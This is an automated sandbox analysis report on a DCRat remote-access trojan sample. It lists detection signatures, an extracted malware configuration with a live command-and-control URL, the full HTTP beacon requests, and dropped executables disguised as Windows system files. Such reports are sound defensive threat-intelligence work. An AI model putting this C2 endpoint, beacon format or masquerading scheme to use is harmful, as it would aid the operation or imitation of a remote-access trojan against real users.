Windows Analysis Report
13ZNp2xvRU.exe

Overview

General Information

Sample name:	13ZNp2xvRU.exe renamed because original name is a hash value
Original sample name:	2519412bd469ce3de2888aa487be8f51.exe
Analysis ID:	1430583
MD5:	2519412bd469ce3de2888aa487be8f51
SHA1:	91dd80c942023f360e81e27f4964504acb9bc4c5
SHA256:	7e98baea7a5b0d51143910cde4c5503ae15d55d6f88b4b840ae7fe79469ed12f
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 13ZNp2xvRU.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://45.130.42.16/6/api144/9Wp/	Avira URL Cloud: Label: malware
Source: http://45.130.42.16/6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sd	Avira URL Cloud: Label: malware
Source: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\smartscreen.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\twain_32\Registry.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 0000001C.00000002.1751125350.0000000002C41000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"j\":\">\",\"l\":\";\",\"u\":\" \",\"W\":\"@\",\"V\":\".\",\"k\":\"-\",\"O\":\"*\",\"H\":\"#\",\"D\":\"%\",\"5\":\"`\",\"p\":\"~\",\"d\":\")\",\"A\":\",\",\"M\":\"!\",\"8\":\"<\",\"N\":\"&\",\"i\":\"$\",\"I\":\"^\",\"4\":\"|\",\"2\":\"(\",\"w\":\"_\"}", "PCRT": "{\"i\":\"(\",\"I\":\"@\",\"d\":\"_\",\"6\":\"^\",\"0\":\"$\",\"c\":\"!\",\"R\":\"%\",\"9\":\" \",\"j\":\"#\",\"w\":\")\",\"G\":\">\",\"y\":\"-\",\"Y\":\"*\",\"b\":\";\",\"l\":\"`\",\"=\":\".\",\"U\":\"<\",\"n\":\"~\",\"p\":\"|\",\"T\":\"&\",\"S\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6cV1joJwieGuWPhbIJ4v", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "H2": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	ReversingLabs: Detection: 81%
Source: C:\ProgramData\smartscreen.exe	ReversingLabs: Detection: 81%
Source: C:\Recovery\RRVGfHJzvQMYfWe.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\twain_32\Registry.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: 13ZNp2xvRU.exe

ReversingLabs: Detection: 81%

Machine Learning detection for dropped file

Source: C:\ProgramData\smartscreen.exe	Joe Sandbox ML: detected
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Joe Sandbox ML: detected
Source: C:\Windows\twain_32\Registry.exe	Joe Sandbox ML: detected
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 13ZNp2xvRU.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: 13ZNp2xvRU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 13ZNp2xvRU.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BEGET-ASRU BEGET-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16

Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16
Source: unknown	TCP traffic detected without corresponding DNS query: 45.130.42.16

Source: global traffic	HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 20:42:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 177375Connection: keep-aliveP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"X-Powered-CMS: Bitrix Site Manager (3cb6b699f91fcd1677ea8a5f7bcf940b)Set-Cookie: PHPSESSID=0joeWo8FC3UGG5G1KO2ZvI0cw6MJJJdg; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: BITRIX_SM_GUEST_ID=2289526; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Set-Cookie: BITRIX_SM_LAST_VISIT=23.04.2024%2023%3A42%3A03; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b6 d0 b5 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d0 bc d1 83 d0 b6 d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 81 d0 bf d0 be d1 80 d1 82 d0 b8 d0 b2 d0 bd d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 82 d0 b0 d0 bf d0 be d1 87 d0 ba d0 b8 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 9c d1 8b 20 d0 bf d1 80 d0 b5 d0 b4 d0 bb d0 b0 d0 b3 d0 b0 d0 b5 d0 bc 20 d1 88 d0 b8 d1 80 d0 be d0 ba d0 b8 d0 b9 20 d0 b0 d1 81 d1 81 d0 be d1 80 d1 82 d0 b8 d0 bc d0 b5 d0 bd d1 82 20 d0 ba d0 b0 d1 87 Data Ascii: <!DOCTYPE html><html lang="ru"><head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="keywords" content=" , , , " /><meta name="description" content="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 20:42:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 177375Connection: keep-aliveP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"X-Powered-CMS: Bitrix Site Manager (3cb6b699f91fcd1677ea8a5f7bcf940b)Set-Cookie: PHPSESSID=KxXgB60mEPIvLU8dX8tTLbwu5q9WYh0Z; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: BITRIX_SM_GUEST_ID=2289526; expires=Fri, 18-Apr-2025 20:42:04 GMT; Max-Age=31104000; path=/Set-Cookie: BITRIX_SM_LAST_VISIT=23.04.2024%2023%3A42%3A04; expires=Fri, 18-Apr-2025 20:42:04 GMT; Max-Age=31104000; path=/Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b6 d0 b5 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d0 bc d1 83 d0 b6 d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 81 d0 bf d0 be d1 80 d1 82 d0 b8 d0 b2 d0 bd d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 82 d0 b0 d0 bf d0 be d1 87 d0 ba d0 b8 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 9c d1 8b 20 d0 bf d1 80 d0 b5 d0 b4 d0 bb d0 b0 d0 b3 d0 b0 d0 b5 d0 bc 20 d1 88 d0 b8 d1 80 d0 be d0 ba d0 b8 d0 b9 20 d0 b0 d1 81 d1 81 d0 be d1 80 d1 82 d0 b8 d0 bc d0 b5 d0 bd d1 82 20 d0 ba d0 b0 d1 87 Data Ascii: <!DOCTYPE html><html lang="ru"><head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="keywords" content=" , , , " /><meta name="description" content="

Source: RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.130.42.16
Source: RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D34000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.130.42.16/6/api144/9Wp/
Source: RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.130.42.16/6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sd
Source: RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.130.42.16/upload/resize_cache/bitlate_proshop/e2e/968_503_1/9w9p11chf5twz88a77wq28ajd28u8b
Source: 13ZNp2xvRU.exe, 00000000.00000002.1725729204.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, RRVGfHJzvQMYfWe.exe, 0000001C.00000002.1751125350.0000000002D47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Creates files inside the system directory

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\twain_32\Registry.exe	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\twain_32\Registry.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\twain_32\ee2ad38f3d4382	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\PLA\Templates\4ed18479ee5d61	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\IME\IMETC\HELP\7ccfebd9e92364	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Jump to behavior
Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	File created: C:\Windows\Panther\setup.exe\5b884080fd4f94	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\13ZNp2xvRU.exe	Code function: 0_2_00007FFD9B893565	0_2_00007FFD9B893565
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe	Code function: 28_2_00007FFD9B893565	28_2_00007FFD9B893565
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 29_2_00007FFD9B893565	29_2_00007FFD9B893565
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe	Code function: 30_2_00007FFD9B8B3565	30_2_00007FFD9B8B3565
Source: C:\Windows\twain_32\Registry.exe	Code function: 31_2_00007FFD9B893565	31_2_00007FFD9B893565
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B883398	32_2_00007FFD9B883398
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B8733B8	32_2_00007FFD9B8733B8
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B87AAA0	32_2_00007FFD9B87AAA0
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B884AA0	32_2_00007FFD9B884AA0
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B88496D	32_2_00007FFD9B88496D
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B87A7E8	32_2_00007FFD9B87A7E8
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B88356F	32_2_00007FFD9B88356F
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B87A4AD	32_2_00007FFD9B87A4AD
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B8829C0	32_2_00007FFD9B8829C0
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B884048	32_2_00007FFD9B884048
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B883ED9	32_2_00007FFD9B883ED9
Source: C:\Windows\twain_32\Registry.exe	Code function: 32_2_00007FFD9B879A65	32_2_00007FFD9B879A65
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 33_2_00007FFD9B883565	33_2_00007FFD9B883565
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe	Code function: 34_2_00007FFD9B893565	34_2_00007FFD9B893565
Source: C:\ProgramData\smartscreen.exe	Code function: 35_2_00007FFD9B893565	35_2_00007FFD9B893565
Source: C:\ProgramData\smartscreen.exe	Code function: 36_2_00007FFD9B8A3565	36_2_00007FFD9B8A3565
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B873565	37_2_00007FFD9B873565
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B88356F	37_2_00007FFD9B88356F
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B88496D	37_2_00007FFD9B88496D
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B881F75	37_2_00007FFD9B881F75
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B883398	37_2_00007FFD9B883398
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B8868F8	37_2_00007FFD9B8868F8
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B885AC1	37_2_00007FFD9B885AC1
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B884048	37_2_00007FFD9B884048
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B881939	37_2_00007FFD9B881939
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe	Code function: 37_2_00007FFD9B883ED9	37_2_00007FFD9B883ED9
